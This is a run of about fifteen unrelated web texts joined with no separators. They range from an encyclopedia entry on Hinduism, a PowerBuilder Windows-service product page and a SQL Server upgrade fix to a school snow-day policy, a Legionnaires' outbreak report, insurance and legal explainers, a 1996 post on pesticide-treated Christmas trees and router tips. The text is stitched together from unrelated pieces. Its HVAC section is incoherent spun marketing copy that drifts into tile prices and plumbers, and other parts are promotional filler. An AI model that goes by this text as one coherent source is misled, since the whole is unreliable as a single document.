The dominant religious expression of the Indian subcontinent. Its salient characteristics include a hoary mythology, an absence of recorded history (or "founder"), a cyclical notion of time, a pantheism that infuses divinity into the world around, an immanentist relationship between people and divinity, a priestly class, and a tolerance of diverse paths to the ultimate ("god"). Its sacral language is Sanskrit, which came to India about 5,000 years ago along with the Aryans, who came from Central Asia. The following are the Hindu sacred texts: (1) Vedas, which are four in number (Rig, Yajur, Sama, and Atharva; 1500 to 1200 B.C.E.); (2) Upanishads (some traced back to the sixth century B.C.E.); (3) Dharma Shastras (sixth and third centuries B.C.E.); (4) Ramayana and Mahabharata (third century B.C.E. and first century C.E.); (5) Puranas (first and tenth centuries C.E.); and (6) Tantras (sixth-seventh centuries C.E.). The Vedas are mythopoeic compositions that celebrate the divine guardians of earth (Aditi), sky (Varuna, Indra, and Surya), and fire (Agni). The fire sacrifices were conducted by kings and their priests to acquire prosperity in work, success in warfare, and felicity in domestic life. The Upanishads were collectively called Vedanta. These texts often contain mystical discourses between a virtuoso and his disciples. They are less ritualistic and more introspective in orientation. Many of them impart esoteric knowledge to the aspirant who seeks illumination. The Dharma Shastras are canonical treatises that enjoin upon Hindus observance of ritual and normative regulations. They uphold a hierarchic social order in which the higher and lower castes are ranked according to the level of their ritual purity. For centuries they have been accepted as the compendia of norms for the social behavior of the Hindu. The Ramayana and Mahabharata are records of ancient dynastic struggles.
They delineate the heroic deeds of men and women who were pitted against court intrigue, warfare, and turbulence. The themes drawn from them are put into plays, songs, and ballads; up to the present, they have inspired creativity in literary and other cultural outputs. The Puranas are records of theophany that aim at the destruction of evil (symbolized by demons) and the recovery of good (symbolized by suffering people). The Puranas center on the principal deities of the post-Vedic era: Shiva, Shakti, and Vishnu. Tantras are a body of formulae and techniques that eliminate the mechanical rituals to seek a direct access to superconsciousness. The three central tenets of Hinduism on the transcendent level are Dharma, Karma, and Moksha. Dharma is the basic moral force that holds the universe (composed of all sentient beings) together. By contrast, Karma is individualized. A man or woman's present status in life is a consequence of good or evil deeds in past lives. Likewise, present conduct holds the key to future existence. Fatalism and free will are two faces of the same synergy. Individuals can cross over metaphysical and social obstacles through sustained effort. Hagiographic accounts of India reveal the success of esteemed men and women who overcame their limitations through determination. Moksha is the transcendence of karmic bondage: the cessation of births and deaths. Even in the present life, one can attain liberation from worldly ensnarements and attain mental peace. The Bhagavad Gita (Divine Song) shows the path through which an individual finds detachment in the midst of occupational commitments. For the numerous householders who constitute the bulk of Hindu society, there are three social pursuits that are normatively defined. These are dharma (ritual and legal obligations), artha (attainment of prosperous life), and kama (satisfaction of sexual and procreative needs). These tenets show that Hinduism did not lack commitment to this world. 
The virtuosi have mainly pursued the transcendent ends; the laity have usually operated on a normative level. Popular Hinduism has centered on fasts and feasts, pilgrimage to temple towns, and so on. It provides scope for the religiously minded people to reach emotional catharsis through collective participation in rituals. Brahmins are, in ritual terms, at the top of the caste system. They are the literati safeguarding the sacred traditions of Hindus. They are mostly householders who are often aligned with sectarian or monastic centers. Brahmins are not monolithic; only a few of them are priests catering to people's sacramental needs. Many of them have been engaged in secular pursuits both in the past and at present. Although not landed or wealthy, they have retained a high ritual position. Their social exclusiveness and inflexibility have often made them targets of attack by Hindu reformers; however, a number of Brahmin individuals were absorbed into the heterodox sects because of their intellectual acumen. This was a paradoxical element in the development of Hinduism. Although there is no central church in Hinduism, sects have arisen within it from time to time to reform, innovate, and provide a more concise interpretation of spirituality. Hindu orthodoxy has often been challenged by heterodox sects, but Hinduism and its sects have always retained links with each other. The main inspiration to innovate has come from orthogenetic sources. Buddhism and Jainism were the early sects that devalued priestly liturgy; they protested against the ascriptive constraints (caste and status) and promoted a new ethicospiritual order. Buddhism made compassion to all living entities (man, animal, and plant) religiously significant; Jainism forbade killing of animals and birds for food. Both these groups made monasticism a more important factor than worship at the temple. 
Subsequently, the bhakti (devotional) sects emerged in south India during the sixth to eleventh centuries C.E. and in north India during the fourteenth to seventeenth centuries. These sects propagated a liberalism that freed people from ritual and social inhibitions and made them all equal before god. These bhakti sects mediated between the Marga (Sanskrit tradition) and the Desi (folk tradition) and reached out to the common people. Through their literary compositions, they greatly enriched the regional languages, such as Punjabi, Hindi, Bengali, Marathi, Tamil, Kannada, and so on. In the wake of colonial rule, new reformist trends emerged in Indian society. Hindu reformism had three well-known figures: Ram Mohan Roy, Dayananda Saraswati, and Vivekananda. Drawing upon the Vedantic tradition, they staunchly supported a cultural nationalism. The political awakening came in the early part of the twentieth century. Aurobindo, Tilak, and Gandhi were among the notables who launched the struggle for freedom from foreign rule. All of them made attempts to redefine Hinduism and make it more adaptable to modern times. In the meantime, the colonial policies of the British rulers engendered a feeling of separateness between Hindus and non-Hindus (especially Muslims). Amity had persisted between the two communities up to the colonial period, in spite of the political rivalries of Hindu and Muslim rulers. The Partition of India (1947) estranged the two groups on a large scale; it was the culmination of a political process that had begun some decades earlier. A careful study of Hinduism will reveal that the phrase Hindu communalism is an oxymoron: Hinduism has been tolerant, while communalism has been overzealous. Despite its traumatic impact on the plural society of India at present, communalism may well weaken or fade out in the near future.
Social Scientific Study of Hinduism The pioneer sociologist to study India on a comparative basis was Max Weber, who inquired into Hinduism and its sects; he drew upon the Indological literature that was available in Germany. More recent studies have taken a social anthropological approach. Bose (1975) has described the religious ties that exist between India's tribes and castes; an index of these ties is the participation of Hindu men and women across the country in celebrations at places of pilgrimage. Ghurye (1969) has shown that the major gods and goddesses of Hinduism are symbols of ethnic integration; the complex process of assimilating minor, local deities into the all-India pantheon of major deities (namely, Shiva, Vishnu, and Shakti) has lent unity to an extremely heterogeneous society. Srinivas (1952) has depicted the Hinduization of an indigenous group in a hill area of south India; this study has enabled him to develop the concept of "Sanskritization" for the analysis of wider aspects of Hindu society. Dumont (1970) has traced the worship of a folk deity of south India to the interactions between Aryan and Dravidian liturgical forms. Marriott (1955) has studied the encounter between the Great Tradition (derived from Sanskrit scriptures) and the Little Tradition (derived from folk beliefs and practices) in a village in north India. Singer (1972) has highlighted the adaptability of the Great Tradition to modern times in spite of its religiosity and hieratic structure. Beyond these social anthropological works, economic and psychological aspects have been considered. Mishra (1962) has examined economic growth in Hindu society with an emphasis on diachronic aspects. Kakar (1982) has referred to the roles of shamans and mystics in the treatment of certain mental illnesses that have afflicted Hindus. Pocock (1973) has analyzed the social impact of a Vaishnavite sect on the beliefs and rituals of a village in western India.
Ishwaran (1983) has explored the rise of a Shaivite sect in south India that, inter alia, contributed to an indigenous model of modernization. Babb (in Madan 1991) and Haraldsson (1987) have analyzed different aspects of the cult surrounding the south Indian mystic Sathya Sai Baba. Vidyarthi (1961) has studied the ritual interdependence between the Brahmin priests of a sacred center in north India and the pilgrims of various castes. Oommen (1986, 1994) has referred to the dominant cultural mainstream (derived from Hinduism and caste hierarchy) that has tended to treat religious minorities as outsiders. Venugopal (1990) has shown that the reformist sects in India have contributed to a sociopolitical ordering of Indian society. In addition to these, there are also studies of temple dancers, ritual specialists, and ascetic groups who belong to Hindu society. C. N. Venugopal N. K. Bose, The Structure of Hindu Society (Delhi: Orient Longman, 1975) L. Dumont, Religion, Politics and History in India (Paris: Mouton, 1970) G. S. Ghurye, Caste and Race in India (Bombay: Popular, 1969) E. Haraldsson, Modern Miracles (New York: Fawcett, 1987) K. Ishwaran, Religion and Society Among the Lingayats of South India (New Delhi: Vikas, 1983) S. Kakar, Shamans, Mystics and Doctors (New York: Knopf, 1982) T. N. Madan (ed.), Religion in India (New York: Oxford University Press, 1991) M. Marriott (ed.), Village India (Chicago: University of Chicago Press, 1955) V. Mishra, Hinduism and Economic Growth (Bombay: Oxford University Press, 1962) T. K. Oommen, "Insiders and Outsiders," International Journal of Sociology 1(1986):53-74 T. K. Oommen, "Religious Nationalism and Democratic Polity," Sociology of Religion 55(1994):455-479 D. F. Pocock, Mind, Body and Wealth (Oxford: Blackwell, 1973) L. Renou, Hinduism (Englewood Cliffs, N.J.: Prentice Hall, 1961) M. Singer, When a Great Tradition Modernizes (New York: Praeger, 1972) M. N. 
Srinivas, Religion and Society Among the Coorgs of South India (Oxford: Clarendon, 1952) C. N. Venugopal, "Reformist Sects and the Sociology of Religion in India," Sociological Analysis 51(1990):S77-S88 L. P. Vidyarthi, The Sacred Complex of Hindu Gaya (Bombay: Asia, 1961) M. Weber, The Religion of India (Glencoe, Ill.: Free Press, 1958).
If you have ever wanted to create a Windows Service program using PowerBuilder then you have come to the right place. PBNIServ will allow you to easily create a service with PowerBuilder 9 or greater. No complex API calls to worry about, it just works right! What is a Windows Service? A Windows Service is a program that has no user interface and is started automatically when Windows starts. The program continues running until Windows is shut down. There does not need to be anyone logged on to Windows for the program to run. A service program is ideal for programs that run on a server machine without user intervention. This would include programs that run reports on a schedule or periodically process files. What is PBNIServ? PBNIServ is a generic Windows Service program written in C. It uses the PBNI (PowerBuilder Native Interface) feature introduced in PowerBuilder 9 to execute functions within a non-visual userobject. A base service object is included that you inherit your objects from. The C program calls the predefined functions and your PowerBuilder code is executed. When your service is installed, the library file and userobject name are given and stored in the registry. The C program reads these values from the registry, generically loads the userobject, and executes the appropriate functions. This design allows you to create a true Windows Service program entirely in PowerBuilder! Also included is a Service Control application. It has functions to start, stop, pause and resume services. You can also use it to send user-defined control codes to the service. Why do I need PBNIServ to create a service? A true Windows Service program uses callbacks. A callback is a function in your program that you pass as an argument to a Windows API function; the API function then makes calls back into your function. PowerBuilder does not support callback functions.
There are two callback functions involved in writing a service program: StartServiceCtrlDispatcher and RegisterServiceCtrlHandlerEx. How do I create a service with PBNIServ? Creating a service with PBNIServ is very easy. There are no Windows API functions to call, just 100% pure PowerBuilder code. See how easy it is by downloading the free demo and giving it a try yourself. Operating System compatibility PBNIServ was originally developed on Windows XP. It has been tested on Windows 2000, Windows XP, Windows Vista 32-bit, Windows 7 64-bit, Windows 8, and Windows 10. I have not tried it on Windows Server 2003 or higher, but I am not aware of anything that would prevent it from working. Windows 2000 does not support the of_sessionchg function.
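The callback mechanism described above is the crux of why plain PowerBuilder cannot do this on its own. The pattern can be sketched generically as follows; this is an analogy in Python, and the dispatcher name is a stand-in that only mirrors (and is not) the real Windows API call:

```python
# A generic sketch of the callback pattern a Windows service requires.
# start_service_ctrl_dispatcher below is a stand-in, NOT the real API:
# you hand the dispatcher YOUR function, and the system later calls
# back into your code on its own schedule.

invocations = []

def start_service_ctrl_dispatcher(service_main):
    # The real dispatcher blocks and invokes service_main from the
    # Service Control Manager; here we simply call it directly.
    service_main(["MyPBService"])

def my_service_main(argv):
    # In PBNIServ, this is the point where the C layer hands control
    # over to the functions of the PowerBuilder non-visual userobject.
    invocations.append(argv[0])

start_service_ctrl_dispatcher(my_service_main)
print(invocations)
```

Because PowerBuilder cannot produce a function pointer to hand to the dispatcher, PBNIServ's small C layer registers the callbacks and then forwards the calls into your PowerBuilder code via PBNI.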
The only thing that content writing and copywriting have in common is writing itself; the thing that differentiates them is the form of writing. Copywriting is said to be the older of the two: some trace it back to 1477, or even to Babylonian times. Content writing, on the other hand, came into existence in the 1990s with the rise of online activity. To learn more about the difference between content writing and copywriting, keep reading this blog. - Learn about content writing and copywriting - Understand the difference between content writing and copywriting - Know about the career opportunities that you can get as a content writer or copywriter What is Content Writing Content writing is a long form of writing. It is done to start a conversation with readers and to inform them about a particular subject; at the same time, content writing is also used to educate readers. Content writing involves writing blog posts, articles, and text posts for all social media forums. The main purpose of content writing is to educate, engage, and inform readers. What is Copywriting? It is the process of writing persuasive words that prompt readers to take immediate action. Copywriting is one of the most effective forms of writing. A copywriter tries to convey his message directly to his audience in fewer words. Copywriting is used to write advertising and promotional content that is sales-oriented; it is also used for marketing purposes and running campaigns. Copywriting includes advertisements, ad copies, promotional email content, sales letters, and scripts.
Difference between Content Writing and Copywriting

| Key differences | Content writing | Copywriting |
| --- | --- | --- |
| Definition | Content writing means writing content to give information to readers. | Copywriting is a method through which a writer tries to prompt readers to take a specific action. |
| Form of writing | Content writing is a long form of writing. | Copywriting is a short form of writing, done in fewer words. |
| Purpose | The sole purpose of content writing is to inform, educate, and engage readers. | The purpose of copywriting is to persuade the reader's mind. |
| Goal | The goal of content writing is to build loyal customers over a longer period by providing quality content. | The main goal of copywriting is to generate sales and boost advertisement. |
| Way of communication | In content writing, a writer communicates with his readers indirectly. | In copywriting, a writer conveys his message directly to the audience in short sentences or words. |

Skills Required for content writing and copywriting - Excellent writing skills: If you want to become a good content writer or copywriter, you need impeccable writing skills, because everything depends on the content you write. If your content is not good enough, you will not be able to engage readers or sell your copy. - Creative thinking: To become a pro at the content game, you have to think outside the box. Your creativity will define the fate of your content, so you have to be deliberately creative while doing content writing and copywriting. - Research skills: Research is the most important part of writing any piece of content, because the way you do your research determines the value of your content. Research gives you in-depth knowledge of the subject you are working on, so that you can cite appropriate facts while writing.
- Strong vocabulary: Whether you are a content writer or a copywriter, you need strong vocabulary skills to write good, engaging content; unless you have a strong command of vocabulary, you will not be able to deliver quality content. Careers in content writing and copywriting Every industry requires a writer in some capacity, and ever since the rise in online business, the demand for content writers and copywriters has been at its peak. To advertise and promote their products and services, businesses require quality content that makes an impact on the reader's mind; that's where the role of a writer comes into play. Let's throw some light on the job opportunities that you can get as a content writer or copywriter. - Research writer - Academic writer - Technical writer - Social media manager - Content marketing manager - Content manager - Creative writer - Content editor and proofreader Is a content writer a copywriter? The answer is a big "No." The two terms are quite different from each other, with only some surface similarities; a content writer is not a copywriter, and vice versa. A content writer tries to build a loyal customer base over a longer period by writing long-form content that communicates with readers indirectly. A copywriter, on the other hand, is the one who sells your brand to your target audience. Technically the two are different terms, even though they are often used as if they were the same. It is high time we understood the difference between them so as not to confuse the two. The difference between content writing and copywriting lies in the style and form of writing: each has its own way of writing content. One uses an indirect approach to communicate with its readers, while the other communicates directly.
I hope this blog helps you get in-depth information about content writing and copywriting. Frequently Asked Questions (FAQs) Is copywriting the same as content writing? No, the two are different from each other; the form of writing is the major difference between them. What pays more, copywriting or content writing? Copywriting: the average salary of a copywriter is higher than that of a content writer. What are the types of copywriting? There are three types of copywriting: 1. Direct response copywriting
We closely monitor the weather forecast for snow and extremely cold temperatures throughout the winter months. The website I trust most for weather information is www.weather.gov. When the decision to close school is made, the information will appear first on my Twitter feed. You can follow me at @DrJoeClark. In addition, parents will receive a phone call, and the information will be posted on our website and all major local news stations. Whenever possible, the decision to close school will be made the previous evening. However, closings may be announced as late as 6 a.m. depending on a variety of factors. There is not a specific temperature policy for the schools, but we use the National Weather Service Windchill Chart as a guide, based on the National Weather Service's published methodology. In addition, we closely monitor road conditions and the ability of our buses to run on time. We will most likely have school if the temperatures remain in the lightest blue color on the chart and the buses are running on time. However, it is not uncommon for us to close when the windchill is -15 or colder for a sustained period of time. We make decisions that are in the best interest of our students, with safety as our number one priority. Parents know their children best. If parents are concerned for their children's safety getting to and from school or activities, we respect their right to keep them home. When the Nordonia Schools are closed for weather, all evening activities in the elementary and middle school buildings are cancelled. High school activities may take place depending on the weather throughout the day. In addition, pre-school and Champions are cancelled, and transportation to CVCC is not provided on "snow days." Community groups scheduled to use school facilities on "snow days" (e.g., youth athletic leagues, Scouts, etc.) will have their events cancelled.
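For reference, the National Weather Service windchill chart mentioned above is generated from a published formula that combines air temperature (in degrees Fahrenheit) and wind speed (in mph); a quick sketch:

```python
def wind_chill_f(temp_f: float, wind_mph: float) -> float:
    """NWS wind chill index; valid for temp_f <= 50 and wind_mph > 3."""
    v = wind_mph ** 0.16
    return 35.74 + 0.6215 * temp_f - 35.75 * v + 0.4275 * temp_f * v

# For example, 0 F with a 15 mph wind works out to about -19 F,
# colder than the -15 threshold mentioned above.
print(round(wind_chill_f(0, 15)))  # -> -19
```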
Please know that while I appreciate good-natured tweets from students begging me for a day off, they are absolutely no factor in my decision-making process. Also, Twitter posts from local weathermen making predictions about the chances of having a snow day are made to increase their social media traffic and have no credibility.
16 Indiana Journal of Global Legal Studies 565 (2009) The surge of interest among international lawyers in "constitutionalism" represents one of several efforts to reconceptualize international governance; others include the research projects on global administrative law and legalization. The article applies the constitutionalist lens to international environmental law, one of the few fields of international law to which constitutionalist modes of analysis have not yet been applied. Given the protean quality of the terms "constitution" and "constitutionalism," the article begins by unpacking these concepts. By disaggregating them into a number of separate variables with more determinate, unambiguous meanings, we can answer the question "Is there an international environmental constitution?" in a more nuanced way: not in an all-or-nothing fashion, but by considering the extent to which international environmental law has constitutional dimensions. The article concludes that, although individual treaty regimes have constitutional features, international environmental law as a whole lacks the hallmarks of a constitutional order. Global Constitutionalism – Process and Substance, Symposium, Kandersteg, Switzerland, January 17-20, 2008. "Is There an International Environmental Constitution?," Indiana Journal of Global Legal Studies 16, no. 2, Article 8. Available at: http://www.repository.law.indiana.edu/ijgls/vol16/iss2/8
Since the last week of July, Executive North Regional Health officials have reported up to 16 Legionnaires' disease cases in Porto, or Oporto, Portugal's second largest city, according to a health ministry press release (computer translated). The press release states that 12 cases are confirmed; however, local media put the case count at 16. According to the official health ministry information, 10 of the cases occurred in residents of Grand Harbour, while two cases were considered travel-associated. At least two patients are still hospitalized for their illness, and health officials note that they are responding favorably to treatment. Legionnaires' disease is caused by the bacterium Legionella. Symptoms resemble those of pneumonia and include cough, shortness of breath, fever, and muscle aches; additional symptoms include headache, fatigue, loss of appetite, confusion and diarrhea. Symptoms usually appear two to 10 days after significant exposure to Legionella bacteria. Most cases of Legionnaires' disease can be traced to plumbing systems where conditions are favorable for Legionella growth, such as whirlpool spas, hot tubs, humidifiers, hot water tanks, cooling towers, and evaporative condensers of large air-conditioning systems. Legionnaires' disease cannot be spread from person to person. Groups at high risk for Legionnaires' disease include people who are middle-aged or older (especially cigarette smokers), people with chronic lung disease or weakened immune systems, and people who take medicines that weaken their immune systems (immunosuppressive drugs).
This lesson requires careful planning to ensure safety and correct procedure. Students use a light table to trace shapes from the film positive before cutting paper stencils. Suggested Time Frame: 1 class period - Students will trace their film positives using a light table - Students will cut three paper stencils to create a multi-layered print
Something that has come up when upgrading Microsoft Operations Manager 2007 to 2012 is an extra step that isn't really documented in the Ops Manager upgrade guide. When upgrading from Ops Manager 2007 to 2012, you also need to upgrade the SQL Server to SQL Server 2008 R2, as that is required by Ops Manager 2012. Since the Ops Manager 2007 install probably dates from 2007 or 2008, it is probably running on SQL Server 2005 today, which means the database must be upgraded before the Ops Manager software can be, because one of the prerequisites for running Ops Manager 2012 is SQL Server 2008 R2. The problem comes from the fact that when you upgrade SQL Server, there is a setting called the compatibility level which doesn't get changed by default. The reason for this is that you can continue to use older T-SQL syntax while still upgrading the database engine to the newest version. When the compatibility level is left at the older setting (in this case SQL Server 2005 compatibility), newer T-SQL features aren't available. In the case of Ops Manager going from SQL Server 2005 to SQL Server 2008 R2, the feature needed is the MERGE statement, which wasn't available in SQL Server 2005. The annoying thing here is that Microsoft doesn't test for the compatibility level during the Ops Manager upgrade process, so this doesn't get flagged. This means that you'll get through the service upgrade, and when you get into the second phase (doing the management group updates) the System Center Management Configuration Service will throw error number 29112 and the entire Ops Manager system will stop working. It throws this error because the Management Configuration Service is attempting to create stored procedures which use the MERGE statement, which the SQL Server 2005 compatibility level doesn't understand. Thankfully, fixing this is very easy.
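For context, MERGE statements of the following general shape are what fail to parse under compatibility level 90 (SQL Server 2005) but run under level 100. The table and column names here are purely illustrative and are not the actual stored procedures Ops Manager creates:

```sql
-- Illustrative only: MERGE parses under compatibility level 100
-- (SQL Server 2008) but not under level 90 (SQL Server 2005).
MERGE dbo.TargetState AS t
USING dbo.SourceState AS s
    ON t.Id = s.Id
WHEN MATCHED THEN
    UPDATE SET t.Value = s.Value
WHEN NOT MATCHED BY TARGET THEN
    INSERT (Id, Value) VALUES (s.Id, s.Value);
```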
Log into the SQL Server database engine which hosts the Ops Manager databases. In the Object Explorer within SQL Server Management Studio, right-click the OperationsManager and OperationsManagerDW databases and select Properties (do one database at a time). On the Options tab, change the compatibility level from SQL Server 2005 to SQL Server 2008, then click OK. If you prefer, this change can also be made with a couple of simple ALTER DATABASE statements as shown below. ALTER DATABASE [OperationsManager] SET COMPATIBILITY_LEVEL = 100 ALTER DATABASE [OperationsManagerDW] SET COMPATIBILITY_LEVEL = 100 Either way, once the change is made there is no restart of the database engine required. Just fire up the System Center Management Configuration Service and let it do its thing, and it will complete that step of the upgrade process. I hope this helps,
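One further check worth noting: the current compatibility level of each database can be verified before and after the change with a query against sys.databases (90 = SQL Server 2005, 100 = SQL Server 2008/2008 R2):

```sql
-- 90 = SQL Server 2005, 100 = SQL Server 2008 / 2008 R2
SELECT name, compatibility_level
FROM sys.databases
WHERE name IN (N'OperationsManager', N'OperationsManagerDW');
```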
Softwareonlineusa.com: The USA's Online Laptop, Mac and PC Software Store When you begin searching for a laptop, you will find a lot of information, some of it helpful and some of it dated and meaningless. It can be difficult to identify which information is best, so it is fortunate you found this article; you can use the following suggestions to make good choices. Before you begin laptop shopping, get an idea of the kind of work you expect to get out of it. You may find that you do not really need the super-expensive, top-of-the-line model for the work you actually do. This can save you a great deal of money. If you are buying a laptop online, you shouldn't pay extra to have programs such as word processors pre-installed; you will most likely be charged the full retail price for the software. Instead, check a discount software vendor to save money. You can often save 20 to 30 percent, and sometimes even more. Before buying a netbook, really consider whether it has the processing power you need. Netbooks have excellent battery life but are often weak performers in terms of power. If you use the machine for email and light word processing, you will be fine, but if you are looking for more, another option may be better. Consult online reviews when you want to buy a laptop online. While reviews should be taken with a grain of salt, they can help you see whether the model you want is worth purchasing. Such reviews often contain important information on how good or bad a model is and what other buyers' experience was, which can save you a lot of stress and money by showing you what to buy or avoid.
Find out whether a new model of the laptop you are considering is about to come out. Often, the latest model of a laptop is the most expensive, so think about getting the model that just went out of season; you will save money and still have a laptop that is fairly new. The size of your laptop depends on how much you need to travel with it. If you travel often, your best option is a small, lightweight computer. The screen and keyboard are small on these machines, but they make traveling much easier. If you mainly plan to use your laptop at home, you can go bigger. SoftwareOnlineUSA.com sells discount software for Mac or PC, including operating systems and application software: OEM software, software licensing, Microsoft, Adobe, Symantec, and more. Visit SoftwareOnlineUSA.com today.
Words can be misleading at times. Does "no-fault" mean that fault is not assigned under no-fault auto insurance state laws? If everyone settles their own damages, there is no need to determine who is at fault, is there? The question may sound silly, but it is easy to see where it comes from. First of all, no-fault has nothing to do with who is at fault. No-fault state laws do not prevent insurance companies from looking into whose fault an accident is. They simply require policyholders to settle small injury losses through their own insurers rather than chasing after third parties and opening up many small legal cases. Auto insurance companies still want to know whether the accident was the fault of their policyholder or of the third party. If they determine that their policyholder was at fault, it is highly likely that they will increase the premium more than they would for a claim that wasn't the policyholder's fault. So, to answer the question: you may not pay for the injuries of third parties, but you may still go down as the at-fault driver in the accident (at least as far as your auto insurer is concerned). Also, most no-fault states set a limit on how much in damages you can claim from your own insurer. If the damages exceed a certain threshold, or in special circumstances where a driver's negligence caused serious suffering, third parties are allowed to sue the at-fault driver. So police and auto insurers will try to find who is at fault in an accident of a certain size for several reasons. 1. Police need to decide whether to charge the driver with a traffic violation, and insurers need to decide whether to charge extra premium. 2. Both need to do their jobs properly in case the matter goes to court or further claims come back to the insurers. Clearly, the driver who is responsible for the accident needs to be identified in any case. Otherwise, people could not be held accountable for irresponsible driving practices. In other words, bad drivers would be allowed to walk away with little or no financial or legal consequence. This cannot be allowed, as it would lead to more and more insurance losses. Modern automobile insurance pricing is based on penalizing risky drivers and rewarding good ones.
The Dirty Facts on Affordable Home Heating and Air Conditioning
By specifying a furnace's energy output in BTU, you can gauge the amount of heating the furnace can generate. Many modern gas water heaters let you control both the heating rate and the amount of heating. If a furnace doesn't list its output BTU, you can calculate it easily using the parameters mentioned above. A variable-capacity furnace provides the most effective heating and cooling. It should be mentioned, however, that floor furnaces will only become blocked if they are not properly cared for and maintained, so this problem isn't guaranteed to happen if that option is chosen. An air conditioner, like any other piece of equipment, can malfunction at any hour of the day, and that means you may have to endure a difficult ordeal to beat the heat. Whether your air conditioner has malfunctioned in the middle of the night or on a busy afternoon, all you have to do is call the experts and they'll handle the rest. Nevertheless, there remain occasions when an air conditioner stops working because of a technical glitch or a power failure. An air conditioner is composed of many parts that require repair, and occasionally replacement, and this work should only be carried out by experts in the specialty. It requires regular maintenance and servicing in order to function effectively.
The Honest to Goodness Truth on Affordable Home Heating and Air Conditioning
When it's a toss-up between repairing and replacing, your contractor should give you the advantages and disadvantages of each option. Heating and AC repair and installation are the most frequently purchased home appliance services. Along with a wide selection of colours and patterns, tile is easy to maintain, and tile prices are becoming increasingly affordable. Regular maintenance and servicing of the air conditioner will increase the lifespan of the unit and also boost its performance. Moreover, AC repairs are far less of a headache when handled by someone who is trusted by a large number of people. AC repair and maintenance can become troublesome if not handled by the right personnel. Necessary repairs and maintenance are done by a plumber. The service is available at a very affordable rate, ensures customer satisfaction, and gives you an easy remedy for your troubles. In times such as these, AC repair service is readily available: fast, handy, and affordably priced. With so many options for heating and air-conditioning assistance, you might get confused about which to choose. It is crucial to make sure that air-duct cleaning isn't just an add-on service offered by the organization. Their services are hassle-free as well as affordable. General service and upkeep of the air conditioner will enhance the performance of the unit and also boost its lifespan.
Raising The Floor: How a Universal Basic Income Can Renew Our Economy and Rebuild the American Dream Listen to story: Download: mp3 (Duration: 20:41 — 18.9MB) FEATURING ANDY STERN – What would you do with your life if you didn’t have to worry about earning a salary and your most basic needs were met? That is a question that only the independently wealthy in our country have the luxury of contemplating. You might become an artist, a writer, a tech innovator, a chef – the possibilities are endless. But of course you can’t imagine such things. You and I have to worry about where we get our health insurance, how we might juggle two jobs to make ends meet, how we are going to pay for child care or rent. A vast majority of Americans are stuck working in an economy that is not working for them – one where jobs are part time, pay is dismal, the so-called “gig-economy” is ever dominant, and unionization is stagnant. Andy Stern, former president of one of the nation’s strongest unions, SEIU, has offered the idea of a universal basic income (UBI) as a solution to our rapidly transforming economy. Citing the increasing replacement of human workers with an automated workforce, Stern, in a new book, has made a strong case for why we need a universal basic income now more than ever. Andy Stern, former president of the Service Employees International Union (SEIU), a 2.2 million strong organization. He served on the Simpson-Bowles commission and is currently the Ronald O. Perelman Senior Fellow at Columbia University’s Richard Paul Richman Center for Business, Law, and Public Policy. He is the author of Raising The Floor: How a Universal Basic Income Can Renew Our Economy and Rebuild the American Dream.
Earlier this year, New Mexico amended its Medical Practice Act to allow collaborative practice relationships between physician assistants (PAs) and licensed physicians (HB 215). The changes to the law allow PAs who practice primary care to collaborate with a licensed physician but require PAs who practice specialty care to be supervised by a licensed physician. Collaboration is defined as the “process by which a licensed physician and a physician assistant jointly contribute to the health care and medical treatment of patients” and requires each of the parties to deliver only the services they are licensed and authorized to provide. A collaborating physician does not need to be physically present when a PA is providing services. New Mexico also changed the certification requirements for PAs. In the past, a PA had to be certified by the National Commission on Certification of Physician Assistants. Now the state medical board can designate additional certifying agencies. The West Virginia Legislature also addressed the issue of PA collaboration and passed a bill amending the state’s Physician Assistants Practice Act (SB 347). Unlike the change to New Mexico’s law, which makes a distinction between collaboration and supervision, the West Virginia bill essentially substitutes the term “supervision” with “collaboration” (i.e., the definition of collaboration is the same as supervision). While it did not create a difference between collaboration and supervision, the bill did make other key changes to PA practice. First, it provided that PAs are entitled to 100 percent of the allowable reimbursement rate given to physicians or advanced practice registered nurses by private and public insurance plans. Second, the bill gave PAs signatory authority for documents within their scope of practice including death certificates, do-not-resuscitate forms, handicap hunting certificates, and utility service maintenance forms. 
Finally, the bill removed a requirement for PAs to maintain certification from the National Commission on Certification of Physician Assistants. The removal of the PA certification requirement caused West Virginia’s governor to veto the bill. In his veto message, the governor stated that “[b]y removing the state’s requirement that physician assistants maintain national certification as a condition of renewing their license, the interests of West Virginia patients are not being protected as strongly as they should be.” To find out more about how states are dealing with PA scope of practice issues please visit the Legislative Database page.
John A. Keslick, Jr. treeman at pond.com Sat Nov 16 07:43:34 EST 1996
I am not against Christmas, nor am I against Christmas Trees. Likewise I am not against Christmas Tree Growers growing trees for the sole purpose of cutting at Christmas. I am not against people who celebrate Christmas in different ways. Nevertheless, what makes me very displeased is the continued cutting of trees for NEW SHOPPING MALLS and FOR MORE ROADS. I have met many families in the last year who agree that we need not sacrifice children for an artificial lawn created with lawn care chemicals. How many environmentalists know that when they go buy a Christmas Tree, at least 90% of the time they are buying a tree laced with chemical pesticides (foliar or systemic)? That is right, Christmas tree growers (most of them) know nothing about tree anatomy. Yet when we buy one of these trees, we are supporting the nitrogen fertilizer industry and the chemical pesticide industry. Many people will not allow chemical use on their property and then turn around and bring a chemically treated tree into the household. No research is available to show what happens when lighting changes the tree's temperature and such. Enough of that. Do not believe it just because I said it; call up and ask the growers for yourself. Explain to them that your children are sensitive to pesticides, and if you find some trees that are not treated, consider yourself fortunate. I have been studying tree anatomy and tree biology for many years. I know why some of the pest and fungus signs exist. Change will come about through money factors. Let's save the water. Be wise and buy pesticide-free trees this Christmas. HAPPY HOLIDAYS.
John A. Keslick Jr.
West Chester, Paoli, Wallingford
Tree Anatomist & Tree Biologist
Phone: 610-696-5353
If you are not OUTRAGED you're not paying attention.
Support ORGANIC FARMERS.
Organic tree treatment web site: http://www.ccil.org/~treeman/ OR http://www.ccil.org/~kenm/env/
- The first step is to power cycle your router: unplug it from the power for 30 seconds, then plug it back in.
- The second step is to adjust your antennas. Move one of the antennas to a 90-degree angle; making sure the antennas are not parallel to each other may be the solution to reaching the problem area. This step can be skipped, however, if you have a router with built-in antennas.
Learn more about how you can boost your wifi signal here.
